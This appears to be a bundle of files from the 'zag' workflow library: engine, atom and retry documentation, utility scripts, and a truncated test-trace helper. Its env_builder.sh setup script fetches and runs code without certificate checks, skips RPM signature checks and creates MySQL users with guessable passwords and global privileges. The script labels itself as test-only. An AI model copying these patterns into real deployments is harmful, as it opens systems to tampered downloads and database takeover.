being as up to date (with important fixes such as :pybug:`4892`,
:pybug:`6721`, :pybug:`9205`, :pybug:`16284`,
:pybug:`22393` and others...) as the most recent python version (which
themselves have a variety of ongoing/recent bugs).
Workers
-------
.. _worker:
**Engine type**: ``'worker-based'`` or ``'workers'``
.. note:: Since this engine is significantly more complicated (and
different) then the others we thought it appropriate to devote a
whole documentation :doc:`section <workers>` to it.
How they run
============
To provide a peek into the general process that an engine goes through when
running lets break it apart a little and describe what one of the engine types
does while executing (for this we will look into the
:py:class:`~zag.engines.action_engine.engine.ActionEngine` engine type).
Creation
--------
The first thing that occurs is that the user creates an engine for a given
flow, providing a flow detail (where results will be saved into a provided
:doc:`persistence <persistence>` backend). This is typically accomplished via
the methods described above in `creating engines`_. The engine at this point
now will have references to your flow and backends and other internal variables
are setup.
Compiling
---------
During this stage (see :py:func:`~zag.engines.base.Engine.compile`) the
flow will be converted into an internal graph representation using a
compiler (the default implementation for patterns is the
:py:class:`~zag.engines.action_engine.compiler.PatternCompiler`). This
class compiles/converts the flow objects and contained atoms into a
`networkx`_ directed graph (and tree structure) that contains the equivalent
atoms defined in the flow and any nested flows & atoms as well as the
constraints that are created by the application of the different flow
patterns. This graph (and tree) are what will be analyzed & traversed during
the engines execution. At this point a few helper object are also created and
saved to internal engine variables (these object help in execution of
atoms, analyzing the graph and performing other internal engine
activities). At the finishing of this stage a
:py:class:`~zag.engines.action_engine.runtime.Runtime` object is created
which contains references to all needed runtime components and its
:py:func:`~zag.engines.action_engine.runtime.Runtime.compile` is called
to compile a cache of frequently used execution helper objects.
Preparation
-----------
This stage (see :py:func:`~zag.engines.base.Engine.prepare`) starts by
setting up the storage needed for all atoms in the compiled graph, ensuring
that corresponding :py:class:`~zag.persistence.models.AtomDetail` (or
subclass of) objects are created for each node in the graph.
Validation
----------
This stage (see :py:func:`~zag.engines.base.Engine.validate`) performs
any final validation of the compiled (and now storage prepared) engine. It
compares the requirements that are needed to start execution and
what is currently provided or will be produced in the future. If there are
*any* atom requirements that are not satisfied (no known current provider or
future producer is found) then execution will **not** be allowed to continue.
Execution
---------
The graph (and helper objects) previously created are now used for guiding
further execution (see :py:func:`~zag.engines.base.Engine.run`). The
flow is put into the ``RUNNING`` :doc:`state <states>` and a
:py:class:`~zag.engines.action_engine.builder.MachineBuilder` state
machine object and runner object are built (using the `automaton`_ library).
That machine and associated runner then starts to take over and begins going
through the stages listed below (for a more visual diagram/representation see
the :ref:`engine state diagram <engine states>`).
.. note::
The engine will respect the constraints imposed by the flow. For example,
if an engine is executing a :py:class:`~zag.patterns.linear_flow.Flow`
then it is constrained by the dependency graph which is linear in this
case, and hence using a parallel engine may not yield any benefits if one
is looking for concurrency.
Resumption
^^^^^^^^^^
One of the first stages is to analyze the :doc:`state <states>` of the tasks in
the graph, determining which ones have failed, which one were previously
running and determining what the intention of that task should now be
(typically an intention can be that it should ``REVERT``, or that it should
``EXECUTE`` or that it should be ``IGNORED``). This intention is determined by
analyzing the current state of the task; which is determined by looking at the
state in the task detail object for that task and analyzing edges of the graph
for things like retry atom which can influence what a tasks intention should be
(this is aided by the usage of the
:py:class:`~zag.engines.action_engine.selector.Selector` helper
object which was designed to provide helper methods for this analysis). Once
these intentions are determined and associated with each task (the intention is
also stored in the :py:class:`~zag.persistence.models.AtomDetail` object)
the :ref:`scheduling <scheduling>` stage starts.
.. _scheduling:
Scheduling
^^^^^^^^^^
This stage selects which atoms are eligible to run by using a
:py:class:`~zag.engines.action_engine.scheduler.Scheduler` implementation
(the default implementation looks at their intention, checking if predecessor
atoms have ran and so-on, using a
:py:class:`~zag.engines.action_engine.selector.Selector` helper
object as needed) and submits those atoms to a previously provided compatible
`executor`_ for asynchronous execution. This
:py:class:`~zag.engines.action_engine.scheduler.Scheduler` will return a
`future`_ object for each atom scheduled; all of which are collected into a
list of not done futures. This will end the initial round of scheduling and at
this point the engine enters the :ref:`waiting <waiting>` stage.
.. _waiting:
Waiting
^^^^^^^
In this stage the engine waits for any of the future objects previously
submitted to complete. Once one of the future objects completes (or fails) that
atoms result will be examined and finalized using a
:py:class:`~zag.engines.action_engine.completer.Completer` implementation.
It typically will persist results to a provided persistence backend (saved
into the corresponding :py:class:`~zag.persistence.models.AtomDetail`
and :py:class:`~zag.persistence.models.FlowDetail` objects via the
:py:class:`~zag.storage.Storage` helper) and reflect
the new state of the atom. At this point what typically happens falls into two
categories, one for if that atom failed and one for if it did not. If the atom
failed it may be set to a new intention such as ``RETRY`` or
``REVERT`` (other atoms that were predecessors of this failing atom may also
have there intention altered). Once this intention adjustment has happened a
new round of :ref:`scheduling <scheduling>` occurs and this process repeats
until the engine succeeds or fails (if the process running the engine dies the
above stages will be restarted and resuming will occur).
.. note::
If the engine is suspended while the engine is going through the above
stages this will stop any further scheduling stages from occurring and
all currently executing work will be allowed to finish (see
:ref:`suspension <suspension>`).
Finishing
---------
At this point the machine (and runner) that was built using the
:py:class:`~zag.engines.action_engine.builder.MachineBuilder` class has
now finished successfully, failed, or the execution was suspended. Depending on
which one of these occurs will cause the flow to enter a new state (typically
one of ``FAILURE``, ``SUSPENDED``, ``SUCCESS`` or ``REVERTED``).
:doc:`Notifications <notifications>` will be sent out about this final state
change (other state changes also send out notifications) and any failures that
occurred will be reraised (the failure objects are wrapped exceptions). If no
failures have occurred then the engine will have finished and if so desired the
:doc:`persistence <persistence>` can be used to cleanup any details that were
saved for this execution.
Special cases
=============
.. _suspension:
Suspension
----------
Each engine implements a :py:func:`~zag.engines.base.Engine.suspend`
method that can be used to *externally* (or in the future *internally*) request
that the engine stop :ref:`scheduling <scheduling>` new work. By default what
this performs is a transition of the flow state from ``RUNNING`` into a
``SUSPENDING`` state (which will later transition into a ``SUSPENDED`` state).
Since an engine may be remotely executing atoms (or locally executing them)
and there is currently no preemption what occurs is that the engines
:py:class:`~zag.engines.action_engine.builder.MachineBuilder` state
machine will detect this transition into ``SUSPENDING`` has occurred and the
state machine will avoid scheduling new work (it will though let active work
continue). After the current work has finished the engine will
transition from ``SUSPENDING`` into ``SUSPENDED`` and return from its
:py:func:`~zag.engines.base.Engine.run` method.
.. note::
When :py:func:`~zag.engines.base.Engine.run` is returned from at that
point there *may* (but does not have to be, depending on what was active
when :py:func:`~zag.engines.base.Engine.suspend` was called) be
unfinished work in the flow that was not finished (but which can be
resumed at a later point in time).
Scoping
=======
During creation of flows it is also important to understand the lookup
strategy (also typically known as `scope`_ resolution) that the engine you
are using will internally use. For example when a task ``A`` provides
result 'a' and a task ``B`` after ``A`` provides a different result 'a' and a
task ``C`` after ``A`` and after ``B`` requires 'a' to run, which one will
be selected?
Default strategy
----------------
When an engine is executing it internally interacts with the
:py:class:`~zag.storage.Storage` class
and that class interacts with the a
:py:class:`~zag.engines.action_engine.scopes.ScopeWalker` instance
and the :py:class:`~zag.storage.Storage` class uses the following
lookup order to find (or fail) a atoms requirement lookup/request:
#. Transient injected atom specific arguments.
#. Non-transient injected atom specific arguments.
#. Transient injected arguments (flow specific).
#. Non-transient injected arguments (flow specific).
#. First scope visited provider that produces the named result; note that
if multiple providers are found in the same scope the *first* (the scope
walkers yielded ordering defines what *first* means) that produced that
result *and* can be extracted without raising an error is selected as the
provider of the requested requirement.
#. Fails with :py:class:`~zag.exceptions.NotFound` if unresolved at this
point (the ``cause`` attribute of this exception may have more details on
why the lookup failed).
.. note::
To examine this information when debugging it is recommended to
enable the ``BLATHER`` logging level (level 5). At this level the storage
and scope code/layers will log what is being searched for and what is
being found.
.. _scope: http://en.wikipedia.org/wiki/Scope_%28computer_science%29
Interfaces
==========
.. automodule:: zag.engines.base
Implementations
===============
.. automodule:: zag.engines.action_engine.engine
Components
----------
.. warning::
External usage of internal engine functions, components and modules should
be kept to a **minimum** as they may be altered, refactored or moved to
other locations **without** notice (and without the typical deprecation
cycle).
.. automodule:: zag.engines.action_engine.builder
.. automodule:: zag.engines.action_engine.compiler
.. automodule:: zag.engines.action_engine.completer
.. automodule:: zag.engines.action_engine.deciders
.. automodule:: zag.engines.action_engine.executor
.. automodule:: zag.engines.action_engine.process_executor
.. automodule:: zag.engines.action_engine.runtime
.. automodule:: zag.engines.action_engine.scheduler
.. automodule:: zag.engines.action_engine.selector
.. autoclass:: zag.engines.action_engine.scopes.ScopeWalker
:special-members: __iter__
.. automodule:: zag.engines.action_engine.traversal
Hierarchy
=========
.. inheritance-diagram::
zag.engines.action_engine.engine.ActionEngine
zag.engines.base.Engine
zag.engines.worker_based.engine.WorkerBasedActionEngine
:parts: 1
.. _automaton: https://docs.openstack.org/automaton/latest/
.. _multiprocessing: https://docs.python.org/2/library/multiprocessing.html
.. _future: https://docs.python.org/dev/library/concurrent.futures.html#future-objects
.. _executor: https://docs.python.org/dev/library/concurrent.futures.html#concurrent.futures.Executor
.. _networkx: https://networkx.github.io/
.. _futures backport: https://pypi.org/project/futures
.. _process pool executor: https://docs.python.org/dev/library/concurrent.futures.html#processpoolexecutor
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/engines.rst | engines.rst |
------------------------
Atoms, tasks and retries
------------------------
Atom
====
An :py:class:`atom <zag.atom.Atom>` is the smallest unit in Zag which
acts as the base for other classes (its naming was inspired from the
similarities between this type and `atoms`_ in the physical world). Atoms
have a name and may have a version. An atom is expected to name desired input
values (requirements) and name outputs (provided values).
.. note::
For more details about atom inputs and outputs please visit
:doc:`arguments and results <arguments_and_results>`.
.. automodule:: zag.atom
.. _atoms: http://en.wikipedia.org/wiki/Atom
Task
=====
A :py:class:`task <zag.task.Task>` (derived from an atom) is a
unit of work that can have an execute & rollback sequence associated with
it (they are *nearly* analogous to functions). Your task objects should all
derive from :py:class:`~zag.task.Task` which defines what a task must
provide in terms of properties and methods.
**For example:**
.. image:: img/tasks.png
:width: 525px
:align: left
:alt: Task outline.
Currently the following *provided* types of task subclasses are:
* :py:class:`~zag.task.Task`: useful for inheriting from and creating your
own subclasses.
* :py:class:`~zag.task.FunctorTask`: useful for wrapping existing
functions into task objects.
.. note::
:py:class:`~zag.task.FunctorTask` task types can not currently be used
with the :doc:`worker based engine <workers>` due to the fact that
arbitrary functions can not be guaranteed to be correctly
located (especially if they are lambda or anonymous functions) on the
worker nodes.
Retry
=====
A :py:class:`retry <zag.retry.Retry>` (derived from an atom) is a special
unit of work that handles errors, controls flow execution and can (for
example) retry other atoms with other parameters if needed. When an associated
atom fails, these retry units are *consulted* to determine what the resolution
*strategy* should be. The goal is that with this consultation the retry atom
will suggest a *strategy* for getting around the failure (perhaps by retrying,
reverting a single atom, or reverting everything contained in the retries
associated `scope`_).
Currently derivatives of the :py:class:`retry <zag.retry.Retry>` base
class must provide a :py:func:`~zag.retry.Retry.on_failure` method to
determine how a failure should be handled. The current enumeration(s) that can
be returned from the :py:func:`~zag.retry.Retry.on_failure` method
are defined in an enumeration class described here:
.. autoclass:: zag.retry.Decision
To aid in the reconciliation process the
:py:class:`retry <zag.retry.Retry>` base class also mandates
:py:func:`~zag.retry.Retry.execute`
and :py:func:`~zag.retry.Retry.revert` methods (although subclasses
are allowed to define these methods as no-ops) that can be used by a retry
atom to interact with the runtime execution model (for example, to track the
number of times it has been called which is useful for
the :py:class:`~zag.retry.ForEach` retry subclass).
To avoid recreating common retry patterns the following provided retry
subclasses are provided:
* :py:class:`~zag.retry.AlwaysRevert`: Always reverts subflow.
* :py:class:`~zag.retry.AlwaysRevertAll`: Always reverts the whole flow.
* :py:class:`~zag.retry.Times`: Retries subflow given number of times.
* :py:class:`~zag.retry.ForEach`: Allows for providing different values
to subflow atoms each time a failure occurs (making it possibly to resolve
the failure by altering subflow atoms inputs).
* :py:class:`~zag.retry.ParameterizedForEach`: Same as
:py:class:`~zag.retry.ForEach` but extracts values from storage
instead of the :py:class:`~zag.retry.ForEach` constructor.
.. _scope: http://en.wikipedia.org/wiki/Scope_%28computer_science%29
.. note::
They are *similar* to exception handlers but are made to be *more* capable
due to their ability to *dynamically* choose a reconciliation strategy,
which allows for these atoms to influence subsequent execution(s) and the
inputs any associated atoms require.
Area of influence
-----------------
Each retry atom is associated with a flow and it can *influence* how the
atoms (or nested flows) contained in that flow retry or revert (using
the previously mentioned patterns and decision enumerations):
*For example:*
.. image:: img/area_of_influence.svg
:width: 325px
:align: left
:alt: Retry area of influence
In this diagram retry controller (1) will be consulted if task ``A``, ``B``
or ``C`` fail and retry controller (2) decides to delegate its retry decision
to retry controller (1). If retry controller (2) does **not** decide to
delegate its retry decision to retry controller (1) then retry
controller (1) will be oblivious of any decisions. If any of
task ``1``, ``2`` or ``3`` fail then only retry controller (1) will be
consulted to determine the strategy/pattern to apply to resolve there
associated failure.
Usage examples
--------------
.. testsetup::
import zag
from zag import task
from zag import retry
from zag.patterns import linear_flow
from zag import engines
.. doctest::
>>> class EchoTask(task.Task):
... def execute(self, *args, **kwargs):
... print(self.name)
... print(args)
... print(kwargs)
...
>>> flow = linear_flow.Flow('f1').add(
... EchoTask('t1'),
... linear_flow.Flow('f2', retry=retry.ForEach(values=['a', 'b', 'c'], name='r1', provides='value')).add(
... EchoTask('t2'),
... EchoTask('t3', requires='value')),
... EchoTask('t4'))
In this example the flow ``f2`` has a retry controller ``r1``, that is an
instance of the default retry controller :py:class:`~zag.retry.ForEach`,
it accepts a collection of values and iterates over this collection when
each failure occurs. On each run :py:class:`~zag.retry.ForEach` retry
returns the next value from the collection and stops retrying a subflow if
there are no more values left in the collection. For example if tasks ``t2`` or
``t3`` fail, then the flow ``f2`` will be reverted and retry ``r1`` will retry
it with the next value from the given collection ``['a', 'b', 'c']``. But if
the task ``t1`` or the task ``t4`` fails, ``r1`` won't retry a flow, because
tasks ``t1`` and ``t4`` are in the flow ``f1`` and don't depend on
retry ``r1`` (so they will not *consult* ``r1`` on failure).
.. doctest::
>>> class SendMessage(task.Task):
... def execute(self, message):
... print("Sending message: %s" % message)
...
>>> flow = linear_flow.Flow('send_message', retry=retry.Times(5)).add(
... SendMessage('sender'))
In this example the ``send_message`` flow will try to execute the
``SendMessage`` five times when it fails. When it fails for the sixth time (if
it does) the task will be asked to ``REVERT`` (in this example task reverting
does not cause anything to happen but in other use cases it could).
.. doctest::
>>> class ConnectToServer(task.Task):
... def execute(self, ip):
... print("Connecting to %s" % ip)
...
>>> server_ips = ['192.168.1.1', '192.168.1.2', '192.168.1.3' ]
>>> flow = linear_flow.Flow('send_message',
... retry=retry.ParameterizedForEach(rebind={'values': 'server_ips'},
... provides='ip')).add(
... ConnectToServer(requires=['ip']))
In this example the flow tries to connect a server using a list (a tuple
can also be used) of possible IP addresses. Each time the retry will return
one IP from the list. In case of a failure it will return the next one until
it reaches the last one, then the flow will be reverted.
Interfaces
==========
.. automodule:: zag.task
.. autoclass:: zag.retry.Retry
.. autoclass:: zag.retry.History
.. autoclass:: zag.retry.AlwaysRevert
.. autoclass:: zag.retry.AlwaysRevertAll
.. autoclass:: zag.retry.Times
.. autoclass:: zag.retry.ForEach
.. autoclass:: zag.retry.ParameterizedForEach
Hierarchy
=========
.. inheritance-diagram::
zag.atom
zag.task
zag.retry.Retry
zag.retry.AlwaysRevert
zag.retry.AlwaysRevertAll
zag.retry.Times
zag.retry.ForEach
zag.retry.ParameterizedForEach
:parts: 1
| zag | /zag-0.2.12.tar.gz/zag-0.2.12/doc/source/user/atoms.rst | atoms.rst |
# Copyright (C) 2014 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import re
import six
import tabulate
from zag.persistence.backends import impl_sqlalchemy
NAME_MAPPING = {
'flowdetails': 'Flow details',
'atomdetails': 'Atom details',
'logbooks': 'Logbooks',
}
CONN_CONF = {
# This uses an in-memory database (aka nothing is written)
"connection": "sqlite://",
}
TABLE_QUERY = "SELECT name, sql FROM sqlite_master WHERE type='table'"
SCHEMA_QUERY = "pragma table_info(%s)"
def to_bool_string(val):
if isinstance(val, (int, bool)):
return six.text_type(bool(val))
if not isinstance(val, six.string_types):
val = six.text_type(val)
if val.lower() in ('0', 'false'):
return 'False'
if val.lower() in ('1', 'true'):
return 'True'
raise ValueError("Unknown boolean input '%s'" % (val))
def main():
backend = impl_sqlalchemy.SQLAlchemyBackend(CONN_CONF)
with contextlib.closing(backend) as backend:
# Make the schema exist...
with contextlib.closing(backend.get_connection()) as conn:
conn.upgrade()
# Now make a prettier version of that schema...
tables = backend.engine.execute(TABLE_QUERY)
table_names = [r[0] for r in tables]
for i, table_name in enumerate(table_names):
pretty_name = NAME_MAPPING.get(table_name, table_name)
print("*" + pretty_name + "*")
# http://www.sqlite.org/faq.html#q24
table_name = table_name.replace("\"", "\"\"")
rows = []
for r in backend.engine.execute(SCHEMA_QUERY % table_name):
# Cut out the numbers from things like VARCHAR(12) since
# this is not very useful to show users who just want to
# see the basic schema...
row_type = re.sub(r"\(.*?\)", "", r['type']).strip()
if not row_type:
raise ValueError("Row %s of table '%s' was empty after"
" cleaning" % (r['cid'], table_name))
rows.append([r['name'], row_type, to_bool_string(r['pk'])])
contents = tabulate.tabulate(
rows, headers=['Name', 'Type', 'Primary Key'],
tablefmt="rst")
print("\n%s" % contents.strip())
if i + 1 != len(table_names):
print("")
if __name__ == '__main__':
main() | zag | /zag-0.2.12.tar.gz/zag-0.2.12/tools/schema_generator.py | schema_generator.py |
# This sets up a developer testing environment that can be used with various
# zag projects (mainly for zag, but for others it should work
# fine also).
#
# Some things to note:
#
# - The mysql server that is setup is *not* secured.
# - The zookeeper server that is setup is *not* secured.
# - The downloads from external services are *not* certificate verified.
#
# Overall it should only be used for testing/developer environments (it was
# tested on ubuntu 14.04 and rhel 6.x, for other distributions some tweaking
# may be required).
set -e
set -u
# If on a debian environment this will make apt-get *not* prompt for passwords.
export DEBIAN_FRONTEND=noninteractive
# http://www.unixcl.com/2009/03/print-text-in-style-box-bash-scripting.html
Box () {
str="$@"
len=$((${#str}+4))
for i in $(seq $len); do echo -n '*'; done;
echo; echo "* "$str" *";
for i in $(seq $len); do echo -n '*'; done;
echo
}
Box "Installing system packages..."
if [ -f "/etc/redhat-release" ]; then
yum install -y -q mysql-devel postgresql-devel mysql-server \
wget gcc make autoconf
mysqld="mysqld"
zookeeperd="zookeeper-server"
elif [ -f "/etc/debian_version" ]; then
apt-get -y -qq install libmysqlclient-dev mysql-server postgresql \
wget gcc make autoconf
mysqld="mysql"
zookeeperd="zookeeper"
else
echo "Unknown distribution!!"
lsb_release -a
exit 1
fi
set +e
python_27=`which python2.7`
set -e
build_dir=`mktemp -d`
echo "Created build directory $build_dir..."
cd $build_dir
# Get python 2.7 installed (if it's not).
if [ -z "$python_27" ]; then
py_version="2.7.9"
py_file="Python-$py_version.tgz"
py_base_file=${py_file%.*}
py_url="https://www.python.org/ftp/python/$py_version/$py_file"
Box "Building python 2.7 (version $py_version)..."
wget $py_url -O "$build_dir/$py_file" --no-check-certificate -nv
tar -xf "$py_file"
cd $build_dir/$py_base_file
./configure --disable-ipv6 -q
make --quiet
Box "Installing python 2.7 (version $py_version)..."
make altinstall >/dev/null 2>&1
python_27=/usr/local/bin/python2.7
fi
set +e
pip_27=`which pip2.7`
set -e
if [ -z "$pip_27" ]; then
Box "Installing pip..."
wget "https://bootstrap.pypa.io/get-pip.py" \
-O "$build_dir/get-pip.py" --no-check-certificate -nv
$python_27 "$build_dir/get-pip.py" >/dev/null 2>&1
pip_27=/usr/local/bin/pip2.7
fi
Box "Installing tox..."
$pip_27 install -q 'tox>=1.6.1,<1.7.0'
Box "Setting up mysql..."
service $mysqld restart
/usr/bin/mysql --user="root" --execute='CREATE DATABASE 'zag_citest''
cat << EOF > $build_dir/mysql.sql
CREATE USER 'zag_citest'@'localhost' IDENTIFIED BY 'zag_citest';
CREATE USER 'zag_citest' IDENTIFIED BY 'zag_citest';
GRANT ALL PRIVILEGES ON *.* TO 'zag_citest'@'localhost';
GRANT ALL PRIVILEGES ON *.* TO 'zag_citest';
FLUSH PRIVILEGES;
EOF
/usr/bin/mysql --user="root" < $build_dir/mysql.sql
# TODO(harlowja): configure/setup postgresql...
Box "Installing zookeeper..."
if [ -f "/etc/redhat-release" ]; then
# RH doesn't ship zookeeper (still...)
zk_file="cloudera-cdh-4-0.x86_64.rpm"
zk_url="http://archive.cloudera.com/cdh4/one-click-install/redhat/6/x86_64/$zk_file"
wget $zk_url -O $build_dir/$zk_file --no-check-certificate -nv
yum -y -q --nogpgcheck localinstall $build_dir/$zk_file
yum -y -q install zookeeper-server java
service zookeeper-server stop
service zookeeper-server init --force
mkdir -pv /var/lib/zookeeper
python -c "import random; print random.randint(1, 16384)" > /var/lib/zookeeper/myid
elif [ -f "/etc/debian_version" ]; then
apt-get install -y -qq zookeeperd
else
echo "Unknown distribution!!"
lsb_release -a
exit 1
fi
Box "Starting zookeeper..."
service $zookeeperd restart
service $zookeeperd status | zag | /zag-0.2.12.tar.gz/zag-0.2.12/tools/env_builder.sh | env_builder.sh |
# Copyright (C) 2014 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import optparse
import os
import sys
top_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),
os.pardir))
sys.path.insert(0, top_dir)
from automaton.converters import pydot
from automaton import machines
from zag.engines.action_engine import builder
from zag.engines.worker_based import protocol
from zag import states
# This is just needed to get at the machine object (we will not
# actually be running it...).
class DummyRuntime(object):
def __init__(self):
self.analyzer = mock.MagicMock()
self.completer = mock.MagicMock()
self.scheduler = mock.MagicMock()
self.storage = mock.MagicMock()
def make_machine(start_state, transitions, event_name_cb):
machine = machines.FiniteMachine()
machine.add_state(start_state)
machine.default_start_state = start_state
for (start_state, end_state) in transitions:
if start_state not in machine:
machine.add_state(start_state)
if end_state not in machine:
machine.add_state(end_state)
event = event_name_cb(start_state, end_state)
machine.add_transition(start_state, end_state, event)
return machine
def main():
parser = optparse.OptionParser()
parser.add_option("-f", "--file", dest="filename",
help="write svg to FILE", metavar="FILE")
parser.add_option("-t", "--tasks", dest="tasks",
action='store_true',
help="use task state transitions",
default=False)
parser.add_option("-r", "--retries", dest="retries",
action='store_true',
help="use retry state transitions",
default=False)
parser.add_option("-e", "--engines", dest="engines",
action='store_true',
help="use engine state transitions",
default=False)
parser.add_option("-w", "--wbe-requests", dest="wbe_requests",
action='store_true',
help="use wbe request transitions",
default=False)
parser.add_option("-j", "--jobs", dest="jobs",
action='store_true',
help="use job transitions",
default=False)
parser.add_option("--flow", dest="flow",
action='store_true',
help="use flow transitions",
default=False)
parser.add_option("-T", "--format", dest="format",
help="output in given format",
default='svg')
(options, args) = parser.parse_args()
if options.filename is None:
options.filename = 'states.%s' % options.format
types = [
options.engines,
options.retries,
options.tasks,
options.wbe_requests,
options.jobs,
options.flow,
]
provided = sum([int(i) for i in types])
if provided > 1:
parser.error("Only one of task/retry/engines/wbe requests/jobs/flow"
" may be specified.")
if provided == 0:
parser.error("One of task/retry/engines/wbe requests/jobs/flow"
" must be specified.")
event_name_cb = lambda start_state, end_state: "on_%s" % end_state.lower()
internal_states = list()
ordering = 'in'
if options.tasks:
source_type = "Tasks"
source = make_machine(states.PENDING,
list(states._ALLOWED_TASK_TRANSITIONS),
event_name_cb)
elif options.retries:
source_type = "Retries"
source = make_machine(states.PENDING,
list(states._ALLOWED_RETRY_TRANSITIONS),
event_name_cb)
elif options.flow:
source_type = "Flow"
source = make_machine(states.PENDING,
list(states._ALLOWED_FLOW_TRANSITIONS),
event_name_cb)
elif options.engines:
source_type = "Engines"
b = builder.MachineBuilder(DummyRuntime(), mock.MagicMock())
source, memory = b.build()
internal_states.extend(builder.META_STATES)
ordering = 'out'
elif options.wbe_requests:
source_type = "WBE requests"
source = make_machine(protocol.WAITING,
list(protocol._ALLOWED_TRANSITIONS),
event_name_cb)
elif options.jobs:
source_type = "Jobs"
source = make_machine(states.UNCLAIMED,
list(states._ALLOWED_JOB_TRANSITIONS),
event_name_cb)
graph_attrs = {
'ordering': ordering,
}
graph_name = "%s states" % source_type
def node_attrs_cb(state):
node_color = None
if state in internal_states:
node_color = 'blue'
if state in (states.FAILURE, states.REVERT_FAILURE):
node_color = 'red'
if state == states.REVERTED:
node_color = 'darkorange'
if state in (states.SUCCESS, states.COMPLETE):
node_color = 'green'
node_attrs = {}
if node_color:
node_attrs['fontcolor'] = node_color
return node_attrs
def edge_attrs_cb(start_state, on_event, end_state):
edge_attrs = {}
if options.engines:
edge_attrs['label'] = on_event.replace("_", " ").strip()
if 'reverted' in on_event:
edge_attrs['fontcolor'] = 'darkorange'
if 'fail' in on_event:
edge_attrs['fontcolor'] = 'red'
if 'success' in on_event:
edge_attrs['fontcolor'] = 'green'
return edge_attrs
g = pydot.convert(source, graph_name, graph_attrs=graph_attrs,
node_attrs_cb=node_attrs_cb, edge_attrs_cb=edge_attrs_cb)
print("*" * len(graph_name))
print(graph_name)
print("*" * len(graph_name))
print(source.pformat())
print(g.to_string().strip())
g.write(options.filename, format=options.format)
print("Created %s at '%s'" % (options.format, options.filename))
# To make the svg more pretty use the following:
# $ xsltproc ../diagram-tools/notugly.xsl ./states.svg > pretty-states.svg
# Get diagram-tools from https://github.com/vidarh/diagram-tools.git
if __name__ == '__main__':
main() | zag | /zag-0.2.12.tar.gz/zag-0.2.12/tools/state_graph.py | state_graph.py |
# Copyright 2014 Hewlett-Packard Development Company, L.P.
# Copyright 2014 Samsung Electronics
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Trace a subunit stream in reasonable detail and high accuracy."""
import argparse
import functools
import os
import re
import sys
import mimeparse
import subunit
import testtools
DAY_SECONDS = 60 * 60 * 24
FAILS = []
RESULTS = {}
class Starts(testtools.StreamResult):
def __init__(self, output):
super(Starts, self).__init__()
self._output = output
def startTestRun(self):
self._neednewline = False
self._emitted = set()
def status(self, test_id=None, test_status=None, test_tags=None,
runnable=True, file_name=None, file_bytes=None, eof=False,
mime_type=None, route_code=None, timestamp=None):
super(Starts, self).status(
test_id, test_status,
test_tags=test_tags, runnable=runnable, file_name=file_name,
file_bytes=file_bytes, eof=eof, mime_type=mime_type,
route_code=route_code, timestamp=timestamp)
if not test_id:
if not file_bytes:
return
if not mime_type or mime_type == 'test/plain;charset=utf8':
mime_type = 'text/plain; charset=utf-8'
primary, sub, parameters = mimeparse.parse_mime_type(mime_type)
content_type = testtools.content_type.ContentType(
primary, sub, parameters)
content = testtools.content.Content(
content_type, lambda: [file_bytes])
text = content.as_text()
if text and text[-1] not in '\r\n':
self._neednewline = True
self._output.write(text)
elif test_status == 'inprogress' and test_id not in self._emitted:
if self._neednewline:
self._neednewline = False
self._output.write('\n')
worker = ''
for tag in test_tags or ():
if tag.startswith('worker-'):
worker = '(' + tag[7:] + ') '
if timestamp:
timestr = timestamp.isoformat()
else:
timestr = ''
self._output.write('%s: %s%s [start]\n' %
(timestr, worker, test_id))
self._emitted.add(test_id)
def cleanup_test_name(name, strip_tags=True, strip_scenarios=False):
"""Clean up the test name for display.
By default we strip out the tags in the test because they don't help us
in identifying the test that is run to it's result.
Make it possible to strip out the testscenarios information (not to
be confused with tempest scenarios) however that's often needed to
identify generated negative tests.
"""
if strip_tags:
tags_start = name.find('[')
tags_end = name.find(']')
if tags_start > 0 and tags_end > tags_start:
newname = name[:tags_start]
newname += name[tags_end + 1:]
name = newname
if strip_scenarios:
tags_start = name.find('(')
tags_end = name.find(')')
if tags_start > 0 and tags_end > tags_start:
newname = name[:tags_start]
newname += name[tags_end + 1:]
name = newname
return name
def get_duration(timestamps):
start, end = timestamps
if not start or not end:
duration = ''
else:
delta = end - start
duration = '%d.%06ds' % (
delta.days * DAY_SECONDS + delta.seconds, delta.microseconds)
return duration
def find_worker(test):
for tag in test['tags']:
if tag.startswith('worker-'):
return int(tag[7:])
return 'NaN'
# Print out stdout/stderr if it exists, always
def print_attachments(stream, test, all_channels=False):
"""Print out subunit attachments.
Print out subunit attachments that contain content. This
runs in 2 modes, one for successes where we print out just stdout
and stderr, and an override that dumps all the attachments.
"""
channels = ('stdout', 'stderr')
for name, detail in test['details'].items():
# NOTE(sdague): the subunit names are a little crazy, and actually
# are in the form pythonlogging:'' (with the colon and quotes)
name = name.split(':')[0]
if detail.content_type.type == 'test':
detail.content_type.type = 'text'
if (all_channels or name in channels) and detail.as_text():
title = "Captured %s:" % name
stream.write("\n%s\n%s\n" % (title, ('~' * len(title))))
# indent attachment lines 4 spaces to make them visually
# offset
for line in detail.as_text().split('\n'):
stream.write(" %s\n" % line)
def show_outcome(stream, test, print_failures=False, failonly=False):
global RESULTS
status = test['status']
# TODO(sdague): ask lifeless why on this?
if status == 'exists':
return
worker = find_worker(test)
name = cleanup_test_name(test['id'])
duration = get_duration(test['timestamps'])
if worker not in RESULTS:
RESULTS[worker] = []
